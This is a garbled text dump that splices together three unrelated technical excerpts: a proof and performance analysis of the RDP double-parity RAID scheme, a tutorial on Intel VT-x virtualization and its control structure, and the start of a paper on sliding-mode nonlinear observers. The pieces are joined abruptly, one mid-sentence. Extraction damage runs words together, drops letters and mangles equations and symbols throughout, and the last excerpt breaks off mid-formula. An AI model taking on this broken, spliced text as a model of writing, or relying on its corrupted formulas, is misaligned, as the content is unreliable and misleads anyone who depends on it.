num-ber greater than2.We group the blocks at the same position in each device into a stripe. We then take groups of p−1stripes and, within that group of stripes,assign the blocks to diagonal parity sets such that with disks numbered i=0...p and blocks numbered k=0...p−2on each disk,disk block(i,k) belongs to diagonal parity set(i+k)mod p.Disk p is a special diagonal parity disk.We construct row parity sets across disks0to p−1without involving disk p,so that any one lost block of thefirst p disks can be re-constructed from row parity.The normal way to ensure this is to store a single row par-ity block in one of the blocks in each stripe. Without loss of generality,let disk p−1store row parity.The key observation is that the diagonal parity disk can store diagonal parity for all but one of the p diagonals.Since the array only has p−1rows,we can only store p−1of the p possible diagonal parity blocks in each group of p−1stripes.We could select any of the diagonal parity blocks to leave out,but without loss of generality,we choose to not store parity for diagonal parity set p−1,to conform to our numbering scheme.The roles of all the disks other than the di-agonal parity disk are mathematically iden-tical,since they all contribute symmetrically to the diagonal parity disk,and they all con-tribute to make the row parity sums zero.So, in any stripe any one or more of the non-diagonal parity disks could contain row par-ity.We only require that we be able to re-construct any one lost block in a stripe other than the diagonal parity block from row par-ity without reference to the diagonal parity block.We start the proof of the correctness of the RDP algorithm with a necessary Lemma.Lemma1In the sequence of numbers{(p−1+kj)mod p,k=0...p},with p prime and 0<j<p,the endpoints are both equal to p−1,and all numbers0...p−2occur exactly once in the sequence.Proof:Thefirst number in the sequence is p−1by definition.The last number in the sequence is p−1,since(p−1+pj)mod p= p−1+(pj mod p)=p−1.Thus the lemma is true for the two endpoints.Now consider the subsequence of p−1numbers that be-gins with p−1.All these numbers must have values0≤x≤p−1after the modulus oper-ation.If there were a repeating number x in the sequence,then it would have to be true that(x+kj)mod p=x for some k<p. Therefore,kj mod p=0which means that kj is divisible by p.But since p is prime,no multiple of k or j or any of their factors can equal p.Therefore,thefirst p−1numbers in the sequence beginning with p−1are unique, and all numbers from0...p−1are repre-sented exactly once.The next number in the sequence is p−1.We now complete the proof of the correct-ness of RDP.Theorem1An array constructed according to the formal description of RDP can be re-constructed after the loss of any two of its disks.Proof:There are two classes of double fail-ures,those that include the diagonal parity disk,and those that do not.Those failures that include the diagonal parity disk have only one disk that has failed in the row parity section of the array.This disk can be reconstructed from row parity, since the row parity sets do not involve the diagonal parity disk.Upon completion of the reconstruction of one of the failed disks from row parity,the diagonal parity disk can be re-constructed according to the definition of the diagonal parity sets.This leaves all failures of any two disks that are not the diagonal parity disk.From the construction of the array,each disk d intersects all diagonals except diagonal (d+p−1)mod p=(d−1)mod p.Therefore, each disk misses a different diagonal.For any combination of two failed disks d1,d2with d2=d1+j,the two diagonals that are not intersected by both disks are g1=(d1+p−1)mod pg2=(d1+j+p−1)mod p Substituting g1givesg2=(g1+j)mod pSince each of these diagonals is only missing one member,if we have stored diagonal par-ity for the diagonal we can reconstruct themissing element along that diagonal.Since at most one of the diagonals is diagonal p−1, then we can reconstruct at least one block on one of the missing disks from diagonal parity as thefirst step of reconstruction.For the failed disks d1,d2,if we can recon-struct a block from diagonal parity in diago-nal parity set x on disk d1,then we can recon-struct a block on disk d2in diagonal parity set(x+j)mod p,using row parity.Simi-larly,if we can reconstruct a block x from diagonal parity on disk d2,then we can recon-struct a block on disk d1in diagonal parity set(x−j)mod p using row parity. Consider the pair of diagonals g1,g2that are potentially reconstructable after the fail-ure of disks d1,d2.If g1is reconstructable, then we can reconstruct all blocks on each di-agonal(g1−j)mod p,(g1−2j)mod p,...,p−1using alternating row parity and diagonal parity reconstructions.Similarly,if g2is re-constructable,then we can reconstruct all blocks on each diagonal(g2+j)mod p,(g2+ 2j)mod p,...,p−1using alternating row parity and diagonal parity reconstructions. Since g1and g2are adjacent points on the sequence for j generated by Lemma1,then we reach all diagonals0...p−1during recon-struction.If either g1=p−1or g2=p−1,then we are only missing one block from the di-agonal parity set p−1,and that block is re-constructed from row parity at the end of the reconstruction chain beginning with g2or g1 respectively.If both g1=p−1and g2=p−1, then the reconstruction proceeds from both g1and g2,reaching the two missing blocks on diagonal p−1at the end of each chain.These two blocks are each reconstructed from row parity.Therefore,all diagonals are reached during reconstruction,and all missing blocks on each diagonal are reconstructed.We do not need to store or generate the parity of diagonal p−1to complete recon-struction.6Performance Analysis Performance of disk arrays is a function of disk I/O as well as the CPU and memory bandwidth required to construct parity dur-ing normal operation and to reconstruct lost data and parity after failures.In this section, we analyse RDP in terms of both its I/O ef-ficiency and its compute efficiency.Since RDP stores data in the clear,read performance is unaffected by the algorithm, except to the extent that the disk reads and writes associated with data writes interfere with data read traffic.We consider write I/Os for the case where p−1RDP stripes are con-tained within a single stripe of disk blocks,as described in Section7.This implementation optimizes write I/O,and preserves the prop-erty that any stripe of disk blocks can be writ-ten independently of all other stripes.Data writes require writing two parity blocks per stripe.Full stripe writes therefore cost one additional disk I/O compared to full stripe writes in single disk parity arrays.Partial stripe writes can be computed by addition, i.e.recomputing parity on the entire stripe, or subtraction,puting the delta to the parity blocks from the change in each of the data blocks written to,depending on the number of blocks to be written in the stripe. Writes using the subtraction method are com-monly referred to as“small writes”.Writing d disk blocks by the subtraction method re-quires d+2reads and d+2writes.The ad-dition method requires n−d−2reads,and d+2writes to write d disk blocks.If reads and writes are the same cost,then the addi-tion method requires n I/Os,where n is the number of disks in the array,and the subtrac-tion method requires2d+4I/Os.The break-point between the addition and subtraction method is at d=(n−4)/2.The number of disk I/Os for RDP is minimal for a dou-ble failure protection algorithm;writing any one data block requires updating both parity blocks,since each data block must contribute to both parity blocks.We next determine the computational cost of RDP as the total number of exclusive or (xor)operations needed to construct parity. Each data block contributes to one row par-。

Hardware Assisted Virtualization Intel Virtualization TechnologyMat´ıas Zabalj´a ureguimatiasz@.arBuenos Aires,Junio de20081Index1Background,motivation and introduction to Intel Virtualiza-tion Extensions31.1Challenges to virtualizing Intel architecture (3)1.1.1Ring aliasing (3)1.1.2Address-space compression (3)1.1.3Nonfaulting access to privileged state (4)1.1.4Adverse impacts on guest transitions (5)1.1.5Interrupt virtualization (5)1.1.6Ring compression (5)1.1.7Access to hidden state (6)1.2Addressing virtualization challenges in software (6)1.3Intel Virtualization Technology (6)1.3.1Virtual Machine Architecture (6)1.3.2Introduction to VMX operation (7)1.3.3Life Cycle of VMM software (7)1.3.4Virtual Machine Control Structure (8)1.3.5Restrictions on VMX operation (8)2Virtual Machine Control Structure92.1Overview (9)2.2Format of the VMCS region (10)2.3Organization of VMCS data (10)2.4Guest-State Area (10)2.4.1Guest Register State (11)2.4.2Guest Non-Register State (12)2.5Host-State Area (12)2.6VM-Execution Control Fields (13)2.6.1Pin-Based VM-Execution Controls (13)2.6.2Processor-Based VM-Execution Controls (13)2.6.3Exception Bitmap (13)2.6.4I/O-Bitmap Addresses (15)2.6.5Time-Stamp Counter Offset (15)2.6.6Guest/Host Masks and Read Shadows for CR0and CR4.152.6.7CR3-Target Controls (15)2.6.8Controls for CR8Accesses (16)2.6.9MSR-Bitmap Address (16)2.6.10Executive-VMCS Pointer (17)2.7VM-Exit Control Fields (17)2.7.1VM-Exit Controls (17)2.7.2VM-Exit Controls for MSRs (17)2.8VM-Entry Control Fields (18)2.8.1VM-Entry Controls (18)2.8.2VM-Entry Controls for MSRs (18)2.8.3VM-Entry Controls for Event Injection (18)2.9VM-Exit Information Fields (19)2.9.1Basic VM-Exit Information (19)2.9.2Information for VM Exits Due to Vectored Events (19)2.9.3Information for VM Exits Due to Instruction Execution.2013VMX non-root operation203.1Instructions that cause VM exits (20)3.1.1Instructions That Cause VM Exits Unconditionally (20)3.1.2Instructions That Cause VM Exits Conditionally (21)3.2Other causes of VM exits (23)3.3Changes to instruction behavior in VMX non-root operation (25)3.4Other Changes in VMX non-root operation (28)3.4.1Event Blocking (28)3.4.2Treatment of Task Switches (28)4Memory Virtualization294.1Processor Operating Modes&Memory Virtualization (29)4.2Guest&Host Physical Address Spaces (29)4.3Virtualizing Virtual Memory by Brute Force (30)4.4Alternate Approach to Memory Virtualization (31)5Handling interruptions in VMM325.1VMX support for handling interrupts (32)5.2External interrupt virtualization (35)5.2.1Virtualization of Interrupt Vector Space (35)5.2.2Control of Platform Interrupts (37)5.2.3Examples of Handling of External Interrupts (39)A APPENDIX:First steps in programming a VMM42A.1Discovering support for VMX (42)A.2Enabling and entering VMX operation (42)A.3Software Access to the VMCS and related structures (42)A.3.1Software Access to the Virtual-Machine Control Structure42A.3.2VMREAD,VMWRITE,and Encodings of VMCS Fields.43A.3.3Software Access to Related Structures (43)A.3.4VMXON Region (43)A.3.5Using VMCLEAR to initialize a VMCS region (44)A.3.6VMCS states (44)A.4Supporting processor operating modes in guest invironments..45A.4.1Emulating Guest Execution (46)A.5Using VMX instructions (46)A.6VMM setup&tear down (46)A.7Preparation and launching a virtual machine (47)A.8Handling of VM exits (48)A.8.1Handling VM Exits Due to Exceptions (49)A.9Multiprocessor considerations (50)A.9.1Initialization (50)A.9.2Moving a VMCS Between Processors (51)A.10Performance considerations (52)21Background,motivation and introduction to Intel Virtualization Extensions1.1Challenges to virtualizing Intel architecture Established and emerging applications motivate strong support for virtualiza-tion in both server and client computing systems.Unfortunately,the IA-32 and Itanium architectures impose many challenges to providing such support. Software techniques exist that address some of those challenges.Intel microprocessors provide protection based on the concept of a2-bit privilege level,using0for most-privileged software and3for the least privileged. The privilege level determines whether privileged instructions,which control basic CPU functionality,can execute without fault;it also controls address-space accessibility based on the configuration of the processor’s page tables and,for IA-32,segment registers.Most IA software uses only privilege levels 0and3,as Figure1a illustrates.For an OS to control the CPU,some of its components must run with privilege level0.Because a VMM cannot allow a guest OS such control,a guest OS cannot execute at privilege level0.Thus, IA-based VMMs must use ring deprivileging,a technique that runs all guest software at a privilege level greater than0.A VM could deprivilege a guest OS by running it either at privilege level1(the0/1/3model)or at privilege level3 (the0/3/3model).Figures1b and1c illustrate these choices.Although the0/1/3model sup-ports simpler VMMs,it cannot be used on IA-32processors for guests in64-bit mode.The64-bit mode is part of Intel’s EM64T(Extended Memory64Tech-nology),the64-bit extension to IA-32.Ring deprivileging causes numerous virtualization challenges.Intel virtual technology extensions(vt-x)solve vir-tualization challenges in part by allowing guest software to run at its intended privilege level.Guest software is constrained,not by privilege level,but be-cause—for VT-x—it runs in VMX non-root operation.Figure1d illustrates this usage.1.1.1Ring aliasingRing aliasing refers to problems that arise when software is run at a privilege level other than the level for which it was written.An example in IA-32is the PUSH instruction(which pushes its operand on the stack)when executed with the CS register(part of which is the current privilege level).A guest OS could easily determine that it is not running at privilege level0.1.1.2Address-space compressionOperating systems expect to have access to the processor’s full virtual address space,known as the linear-address space in IA-32.A VMM must reserve for itself some portion of the guest’s virtual-address space.The VMM could run entirely within the guest’s virtual-address space,which allows it easy access to guest data,although the VMM’s instructions and data structures might use a substantial amount of the guest’s virtual-address space.Alternatively,the VMM could run in a separate address space,but even in that case the VMM must use a minimal amount of the guest’s virtual-address space for the control structures3Figure1:rings rings ringsthat manage transitions between guest software and the VMM.(For IA-32,these structures include the IDT and the GDT,which reside in the linear-address space.)The VMM must prevent guest access to those portions of the guest’s virtual-address space that the VMM is using.Otherwise,the VMM’s integrity could be compromised if the guest can write to those portions,or the guest could detect that it is running in a virtual machine if it can read them.Guest attempts to access these portions of the address space must generate transitions to the VMM,which can emulate or otherwise support them.The term address-space compression refers to the challenges of protecting these portions of the virtual-address space and supporting guest accesses to them.1.1.3Nonfaulting access to privileged statePrivilege-based protection prevents unprivileged software from accessing certain components of CPU state.In most cases,attempted accesses result in faults, allowing a VMM to emulate the desired guest instruction.However,the IA-32architecture includes instructions that access privileged state and do not fault when executed with insufficient privilege.For example,the IA-32regis-ters GDTR,IDTR,LDTR,and TR contain pointers to data structures that control CPU operation.Software can execute the instructions that write to,or load,these registers(LGDT,LIDT,LLDT,and LTR)only at privilege level0. However,software can execute the instructions that read,or store,from these registers(SGDT,SIDT,SLDT,and STR)at any privilege level.If the VMM maintains these registers with unexpected values,a guest OS using the latter4instructions could determine that it does not have full control of the CPU. 1.1.4Adverse impacts on guest transitionsRing deprivileging can interfere with the effectiveness of facilities in the IA-32 architecture that accelerate the delivery and handling of transitions to OS soft-ware.The IA-32SYSENTER and SYSEXIT instructions support low-latency system calls.SYSENTER always effects a transition to privilege level0,and SYSEXIT will fault if executed outside that privilege level.Ring deprivileging thus has the following implications:•Executions of SYSENTER by a guest application will cause a transition to the VMM and not to the guest OS.The VMM must thus emulate every guest execution of SYSENTER.•Execution of SYSEXIT by a guest OS will cause a fault to the VMM.Thus,the VMM must emulate every guest execution of SYSEXIT.1.1.5Interrupt virtualizationProviding support for external interrupts,especially regarding interrupt mask-ing,presents some specific challenges to VMM design.The IA-32architecture provides mechanisms for masking external interrupts,preventing their deliv-ery when the OS is not ready for them.IA-32uses the interruptflag(IF)in the EFLAGS register to control interrupt masking.A VMM will likely man-age external interrupts and deny guest software the ability to control interrupt masking.Existing protection mechanisms allow such denial of control by ensur-ing that guest attempts to control interrupt masking will fault in the context of ring deprivileging.Such faulting can cause problems because some operat-ing systems frequently mask and unmask interrupts.Intercepting every guest attempt to do so could significantly affect system performance.Even if it were possible to prevent guest modifications of interrupt masking without intercepting each attempt,challenges would remain when a VMM has a “virtual interrupt”to deliver to a guest.A virtual interrupt should be delivered only when the guest has unmasked interrupts.To deliver virtual interrupts in a timely way,a VMM should intercept some,but not all,attempts by a guest to modify interrupt masking.Doing so could signicantly complicate the design of a VMM.1.1.6Ring compressionRing deprivileging uses translation privilege-based mechanisms to protect the VMM from guest software.IA-32includes two such mechanisms:segment limits and paging.Because segment limits do not apply in64-bit mode,paging must be used in this mode.Because IA-32paging does not distinguish privilege levels 0-2,the guest OS must run at privilege level3.Thus,the guest OS will run at the same privilege level as guest applications and will not be protected from them.This problem is called ring compression.51.1.7Access to hidden stateSome components of IA-32CPU state are not represented in any software-accessible register.Examples include the hidden descriptor caches for the seg-ment registers.A segment-register load copies a referenced descriptor(from the GDT or LDT)into this cache,which is not modified if software later writes to the descriptor tables.IA-32does not provide mechanisms for saving and restoring these hidden components of a guest context when changing VMs or for preserving them while the VMM is running.1.2Addressing virtualization challenges in softwareTo address the virtualization challenges that the IA-32architecture presents, VMM designers have developed creative solutions that modify guest software (source or binary).There are examples of VMMs that use sourcelevel mod-ifiations in a technique called paravirtualization.Developers of these VMMs modify a guest-OS kernel and its device drivers to create an interface that is easier to virtualize.Paravirtualization offers high performance and does not require making changes to guest applications.A disadvantage of paravirtual-ization is that it limits the range of supported operating systems.For example, Xen cannot currently support an operating system that its developers have not modified,such as Microsoft Windows.A VMM can support legacy operating systems by making modifications di-rectly to guest-OS binaries.VMMs that use such binary translation techniques include those developed by VMware as well as Virtual PC and Virtual Server from Microsoft.Such VMMs support a broader range of operating systems, albeit with higher performance overheads,than VMMs that use paravirtualiza-tion.A central design goal for Intel Virtualization Technology is to eliminate the need for CPU paravirtualization and binary translation techniques and thereby enable the implementation of VMMs that can support a broad range of unmod-ified guest operating systems while maintaining high levels of performance. 1.3Intel Virtualization TechnologyThis section describes the basics of virtual machine architecture and an overview of the virtual-machine extensions(VMX)that support virtualization of proces-sor hardware for multiple software environments.1.3.1Virtual Machine ArchitectureVirtual-machine extensions define processor-level support for virtual machines on IA-32processors.Two principal classes of software are supported:•Virtual-machine monitors(VMM):A VMM acts as a host and has full con-trol of the processor(s)and other platform hardware.A VMM presents guest software(see next paragraph)with an abstraction of a virtual pro-cessor and allows it to execute directly on a logical processor.A VMM is able to retain selective control of processor resources,physical memory, interrupt management,and I/O.6•Guest software:Each virtual machine(VM)is a guest software environ-ment that supports a stack consisting of operating system(OS)and ap-plication software.Each operates independently of other virtual machines and uses on the same interface to processor(s),memory,storage,graphics, and I/O provided by a physical platform.The software stack acts as if it were running on a platform with no VMM.Software executing in a virtual machine must operate with reduced privilege so that the VMM can retain control of platform resources.1.3.2Introduction to VMX operationProcessor support for virtualization is provided by a form of processor operation called VMX operation.There are two kinds of VMX operation:VMX root op-eration and VMX non-root operation.In general,a VMM will run in VMX root operation and guest software will run in VMX non-root operation.Transitions between VMX root operation and VMX non-root operation are called VMX transitions.There are two kinds of VMX transitions.Transitions into VMX non-root operation are called VM entries.Transitions from VMX non-root op-eration to VMX root operation are called VM exits.Processor behavior in VMX root operation is very much as it is outside VMX operation.The principal differences are that a set of new instructions (the VMX instructions)is available and that the values that can be loaded into certain control registers are limited.Processor behavior in VMX non-root operation is restricted and modified to facilitate virtualization.Instead of their ordinary operation,certain instructions (including the new VMCALL instruction)and events cause VM exits to the VMM.Because these VM exits replace ordinary behavior,the functionality of software in VMX non-root operation is limited.It is this limitation that allows the VMM to retain control of processor resources.There is no software-visible bit whose setting indicates whether a logical processor is in VMX non-root operation.This fact may allow a VMM to prevent guest software from determining that it is running in a virtual machine.Because VMX operation places restrictions even on software running with current privilege level(CPL)0, guest software can run at the privilege level for which it was originally designed. This capability may simplify the development of a VMM.1.3.3Life Cycle of VMM softwareFigure2illustrates the life cycle of a VMM and its guest software as well as the interactions between them.The following items summarize that life cycle:•Software enters VMX operation by executing a VMXON instruction.•Using VM entries,a VMM can then enter guests into virtual machines(one at a time).The VMM effects a VM entry using instructions VMLAUNCH and VMRESUME;it regains control using VM exits.•VM exits transfer control to an entry point specified by the VMM.The VMM can take action appropriate to the cause of the VM exit and can then return to the virtual machine using a VM entry.7Figure2:Interaction of a Virtual-Machine Monitor and Guests •Eventually,the VMM may decide to shut itself down and leave VMX operation.It does so by executing the VMXOFF instruction.1.3.4Virtual Machine Control StructureVMX non-root operation and VMX transitions are controlled by a data struc-ture called a virtual-machine control structure(VMCS).Access to the VMCS is managed through a component of processor state called the VMCS pointer(one per logical processor).The value of the VMCS pointer is the64-bit address of the VMCS.The VMCS pointer is read and written using the instructions VMPTRST and VMPTRLD.The VMM configures a VMCS using the VM-READ,VMWRITE,and VMCLEAR instructions.A VMM could use a differ-ent VMCS for each virtual machine that it supports.For a virtual machine with multiple logical processors(virtual processors),the VMM could use a different VMCS for each virtual processor.1.3.5Restrictions on VMX operationVMX operation places restrictions on processor operation.These are detailed below:•In VMX operation,processors mayfix certain bits in CR0and CR4to specific values and not support other values.VMXON fails if any of these bits contains an unsupported value.Any attempt to set one of these bits to an unsupported value while in VMX operation(including VMX root operation)using any of the CLTS,LMSW,or MOV CR instructions causesa general-protection exception.VM entry or VM exit cannot set any ofthese bits to an unsupported value.(2)NOTE Thefirst processors to support VMX operation require that the following bits be1in VMX operation:CR0.PE,CR0.NE,CR0.PG,and CR4.VMXE.The restrictions on CR0.PE and CR0.PG imply that VMX operation is supported only in paged protected mode(including IA-32e mode).Therefore,guest software cannot be run in unpaged protected8mode or in real-address mode natively.But there are techniques to support these kind of guests with vt-x.•VMXON fails if a logical processor is in A20M mode.Once the processor is in VMX operation,A20M interrupts are blocked.Thus,it is impossible to be in A20M mode in VMX operation.•The INIT signal is blocked whenever a logical processor is in VMX root operation.It is not blocked in VMX non-root operation.Instead,INITs cause VM exits.2Virtual Machine Control Structure2.1OverviewThe virtual-machine control data structure(VMCS)is defined for VMX opera-tion.A VMCS manages transitions in and out of VMX non-root operation(VM entries and VM exits)as well as processor behavior in VMX non-root operation. This structure is manipulated by the new instructions VMCLEAR,VMPTRLD, VMREAD,and VMWRITE.A VMM can use a different VMCS for each virtual machine that it supports. For a virtual machine with multiple logical processors(virtual processors),the VMM can use a different VMCS for each virtual processor.Each logical pro-cessor associates a region in memory with each VMCS.This region is called the VMCS region.Software references a specific VMCS by using the64-bit physical address of the region;such an address is called a VMCS pointer.VMCS point-ers must be aligned on a4-KByte boundary(bits11:0must be zero).A logical processor may maintain any number of active VMCSs.At any given time,one is the current VMCS:•Software makes a VMCS active by executing VMPTRLD with the address of the VMCS.The processor may optimize VMX operation by maintain-ing the state of an active VMCS in memory,on the processor,or both.Software should not make a VMCS active on more than one logical pro-cessor.Software makes a VMCS inactive by executing VMCLEAR with the address of the VMCS.A logical processor does not use an inactive VMCS or maintain its state on the processor.•Software makes a VMCS current by executing VMPTRLD with the ad-dress of the VMCS;that address is loaded into the current-VMCS pointer.VMX instructions VMLAUNCH,VMPTRST,VMREAD,VMRESUME, and VMWRITE operate on the current VMCS.A VMCS remains current until either software executes VMPTRLD with the address of a different VMCS(which then becomes the current VMCS)or software executes VM-CLEAR with the address of the current VMCS(after which there is no current VMCS).NOTE:This document uses the notation RAX,RIP,RSP,RFLAGS,etc. for processor registers because most processors that support VMX operation also support Intel64architecture.For processors that do not support Intel64 architecture,this notation refers to the32-bit forms of those registers(EAX, EIP,ESP,EFLAGS,etc.).92.2Format of the VMCS regionA VMCS region comprises up to4-KBytes.Thefirst32bits of the VMCS region contain the VMCS revision identifier. Processors that maintain VMCS data in different formats use different VMCS revision identifiers.These identifiers enable software to avoid using a VMCS region formatted for one processor on a processor that uses a different format. Software should write the VMCS revision identifier to the VMCS region before using that region for a VMCS.The VMCS revision identifier is never written by the processor;VMPTRLD may fail if its operand references a VMCS region whose VMCS revision identifier differs from that used by the processor.Software can discover the VMCS revision identifier that a processor uses by reading the VMX capability MSR IA32VMX BASIC.The next32bits of the VMCS region are used for the VMX-abort indicator. The contents of these bits do not control processor operation in any way.A logical processor writes a non-zero value into these bits if a VMX abort occurs. Software may also write into thisfield.The remainder of the VMCS region is used for VMCS data(those parts of the VMCS that control VMX non-root operation and the VMX transitions). The format of these data is implementation-specific.To ensure proper behavior in VMX operation,software should maintain the VMCS region and related structures in writeback cacheable memory.Future implementations may allow or require a different memory type.Software should consult the VMX capability MSR IA32VMX BASIC.2.3Organization of VMCS dataThe VMCS data are organized into six logical groups:•Guest-state area.Processor state is saved into the guest-state area on VM exits and loaded from there on VM entries.•Host-state area.Processor state is loaded from the host-state area on VM exits.•VM-execution controlfields.Thesefields control processor behavior in VMX non-root operation.They determine in part the causes of VM exits.•VM-exit controlfields.Thesefields control VM exits.•VM-entry controlfields.Thesefields control VM entries.•VM-exit informationfields.Thesefields receive information on VM exits and describe the cause and the nature of VM exits.They are read-only.The VM-execution controlfields,the VM-exit controlfields,and the VM-entry controlfields are sometimes referred to collectively as VMX controls. 2.4Guest-State AreaThis section describesfields contained in the guest-state area of the VMCS.As noted earlier,processor state is loaded from thesefields on every VM entry and stored into thesefields on every VM exit.102.4.1Guest Register StateThe followingfields in the guest-state area correspond to processor registers:•Control registers CR0,CR3,and CR4(64bits each;32bits on processors that do not support Intel64architecture).•Debug register DR7(64bits;32bits on processors that do not support Intel64architecture).•RSP,RIP,and RFLAGS(64bits each;32bits on processors that do not support Intel64architecture).5•The followingfields for each of the registers CS,SS,DS,ES,FS,GS, LDTR,and TR:–Selector(16bits).–Base address(64bits;32bits on processors that do not support In-tel64architecture).The base-addressfields for CS,SS,DS,andES have only32architecturally-defined bits;nevertheless,the corre-sponding VMCSfields have64bits on processors that support Intel64architecture.–Segment limit(32bits).The limitfield is always a measure in bytes.–Access rights(32bits).The format of thisfield is given in Table20-2 and detailed as follows:The base address,segment limit,and access rights compose the“hidden”part(or“descriptor cache”)of each segment register.These data are included in the VMCS because it is possible for a segment register’s de-scriptor cache to be inconsistent with the segment descriptor in memory (in the GDT or the LDT)referenced by the segment register’s selector.Note that the value of the DPLfield for SS is always equal to the logical processor’s current privilege level(CPL).•The followingfields for each of the registers GDTR and IDTR:–Base address(64bits;32bits on processors that do not support Intel 64architecture).–Limit(32bits).The limitfields contain32bits even though these fields are specified as only16bits in the architecture.•The following MSRs:–IA32DEBUGCTL(64bits)–IA32SYSENTER CS(32bits)–IA32SYSENTER ESP and IA32SYSENTER EIP(64bits;32bits on processors that do not support Intel64architecture)•The register SMBASE(32bits).This register contains the base address of the logical processor’s SMRAM image.112.4.2Guest Non-Register StateIn addition to the register state just described,the guest-state area includes the followingfields that characterize guest state but which do not correspond to processor registers:•Activity state(32bits).Thisfield identifies the logical processor’s activity state.When a logical processor is executing instructions normally,it is in the active state.Execution of certain instructions and the occurrence of certain events may cause a logical processor to transition to an inactive state in which it ceases to execute instructions.The following activity states are defined:(8)1.Active.The logical processor is executing instructions normally.2.HLT.The logical processor is inactive because it executed the HLTinstruction.3.Shutdown.The logical processor is inactive because it incurred atriple fault(9)or some other serious error.4.Wait-for-SIPI.The logical processor is inactive because it is waitingfor a startup-IPI(SIPI).•Interruptibility state(32bits).The IA-32architecture includes features that permit certain events to be blocked for a period of time.For example, execution of STI with RFLAGS.IF=0blocks interrupts(and,optionally, other events)for one instruction after its execution.Another example is that execution of a MOV to SS or a POP to SS blocks interrupts for one instruction after its execution.Thisfield contains information about such blocking.•Pending debug exceptions(64bits;32bits on processors that do not support Intel64architecture).IA-32processors may recognize one or more debug exceptions without immediately delivering them.Thisfield contains information about such exceptions.•VMCS link pointer(64bits).Thisfield is included for future expansion.Software should set thisfield to FFFFFFFF FFFFFFFFH to avoid VM-entry failures.2.5Host-State AreaThis section describesfields contained in the host-state area of the VMCS.As noted earlier,processor state is loaded from thesefields on every VM exit.All fields in the host-state area correspond to processor registers:•CR0,CR3,and CR4(64bits each;32bits on processors that do not support Intel64architecture).•RSP and RIP(64bits each;32bits on processors that do not support Intel64architecture).•Selectorfields(16bits each)for the segment registers CS,SS,DS,ES, FS,GS,and TR.There is nofield in the host-state area for the LDTR selector.12。

Robust observer with sliding mode estimation for nonlinear uncertain systemsK.C.Veluvolu,Y.C.Soh and W.CaoAbstract:To handle the state estimation of a nonlinear system perturbed by a scalar disturbancedistributed by a known nonlinear vector,we incorporate a sliding mode term into a nonlinear obser-ver to realise a robust nonlinear observer.By linking the observability of the unknown input to theoutput measurement,the so-called matching condition is avoided.The measurable output esti-mation error is the sliding surface.In the sliding mode,the reduced-order error system is freefrom the disturbance,and the convergence of the estimation error dynamics is proven.Theunknown input/disturbance is estimated from the sliding mode.Under a Lipschitz condition forthe nonlinear part,the nonlinear observers are designed under the structural assumption that thesystem is observable with respect to any control input.The proposed robust nonlinear estimatoris applied to state and unknown input estimation of a bioreactor.The simulation results demonstratethe effectiveness of the proposed method.1IntroductionSince the pioneering works of linear observer designs–Luenberger observer[1]and Kalmanfilter[2]–there have been many works on nonlinear observer.The works in[3–8]present some fundamental results on the state esti-mation of systems via state transformation and nonlinear observer.Through a nonlinear change of coordinates, linearisation is achieved by input and output derivative injection.The existing results for exact linearisation by input–output injection were unified in[9].Sliding mode control is a well established method for handling disturbances and modelling uncertainties through the concepts of sliding surface design and equivalent control[10,11].On the basis of the same concept,sliding mode observers(SMO)have been developed to robustly estimate the system states[11–21].The Lyapunov based approach of Walcott and Zak[12,22]considered the pro-blems of state observation in the presence of bounded uncertainties/unknown inputs based on a matching con-dition.The approach adopts the use of the switching terms to deal with unknown inputs directly,so that the in the sliding mode is free from unknown inputs. The approach in[16,23]extended the design of[11]and designed the SMO such that the states affected by the unknown inputs are dealt with by the switching terms,and the method requires the reduced-order system itself to be stable.The work in[18]extended the SMO design of[22] nonlinear systems based on matching con-ditions[11].Most of the works to date are limited to linear systems with constant disturbance distribution matrix and rely on either structural conditions or matching assumptions such that the error system is stable and free from unknown inputs.The other category of SMO is based on the equivalent control concept and it required the systems to satisfy struc-tural conditions such as the unknown inputs are decoupled in the transformed domain and only appear in fewer states.The equivalent control based SMO wasfirst proposed by Utkin[11]and its extensions to nonlinear systems were addressed in[14,15,17,24].These methods chose the output estimation error and its higher order derivatives as the sliding surfaces.These methods require structural assumptions for the design of switching terms for all the states,which are in general conservative.In practical appli-cations,as only the output estimation error is available,the higher order derivatives have to be obtained.A possible way is to use sliding mode differentiators with low-passfiltering [11].The approximation of the equivalent control signal by low-passfilters at each step may introduce some delays that may lead to instability in high-order systems.The implementation issues of low-passfilters,their effects on estimation accuracy,andfilter time constants were dis-cussed in[25].In terms of high-gain design for systems satisfying Lipschitz condition,the high-gain observer of Khalil is a successful method for handling modelling uncertainties [26].The asymptotical/exponential estimation convergence is proved when the modelling uncertainties are Lipschitz continuous.In this paper,we shall consider a nonlinear plant per-turbed by a disturbance input.We limit our scope to a scalar disturbance that is not necessarily Lipschitz continu-ous and distributed by a known vector.We analyse the SMO from the perspective of estimating unknown input/disturb-ance and making the state estimation insensitive to unknown input/disturbances.Our SMO is integrated into the nonlinear observer design so that in the sliding mode, the disturbance under an equivalent control becomes an increment of Lipschitzian function and the convergence of the error dynamics of the state estimation is established. The proposed method does not require the matching con-dition on the unknown input distribution matrix.A proper#The Institution of Engineering and Technology2007doi:10.1049/iet-cta:20060434Paperfirst received28th April2006and in revised form21st March2007 The authors are with the School of Electrical and Electronic Engineering, Nanyang Technological University,Block S2,Nanyang Ave, Singapore639798,SingaporeE-mail:kalyan@.sgdesign of the estimation feedback gain ensures asymptoticconvergence of the estimation residual.Moreover,through an inverse state transformation,we obtain the robust non-linear estimator for the original system.The rest of the paper is organized as follows:Section 2gives some preliminaries on nonlinear state transformation,inverse transformation,and nonlinear observer design.Section 3presents the design and analysis of robust non-linear observer that incorporates a sliding mode observer.Section 4discusses the estimation of the unknown input.In Section 5,the robust nonlinear observer is applied to a bioreactor to demonstrate the effectiveness of the proposed observer design.Section 6concludes the paper.Throughout this paper,l max (A )denotes the maximum eigenvalue of a matrix A ,and k A k denotes the 2-norm p (l max (A TA ))of a matrix A .2Background resultsConsider a nonlinear system,a single-input single-output (SISO)nonlinear system described by˙x (t )¼f (x )þb (x )u (t )y (t )¼h (x )(1)where x W [x 1x 2ÁÁÁx n ]T [M ,R n ,a C 1connectedmanifold of dimension n ,and we assume that the state space of interest M is compact.The nonlinear functions f (x ),b (x )are smooth vector fields on M ,h (x )is a smooth function from M to R .u is the bounded control input and y is the measurable output.By performing a nonlinear state transformationx !~xW [~x 1~x 2ÁÁÁ~x n ]T ¼F (x )¼[h (x )L f h (x )ÁÁÁL (n À1)fh (x )]T (2)where Lie derivative is defined as L f h (x )W [@h (x )=@x ]f ,one can obtain the following in general_~x¼A ~x þc (~x ,u )y ¼C ~x(3)where A WÂ0I (n À1)Â(n 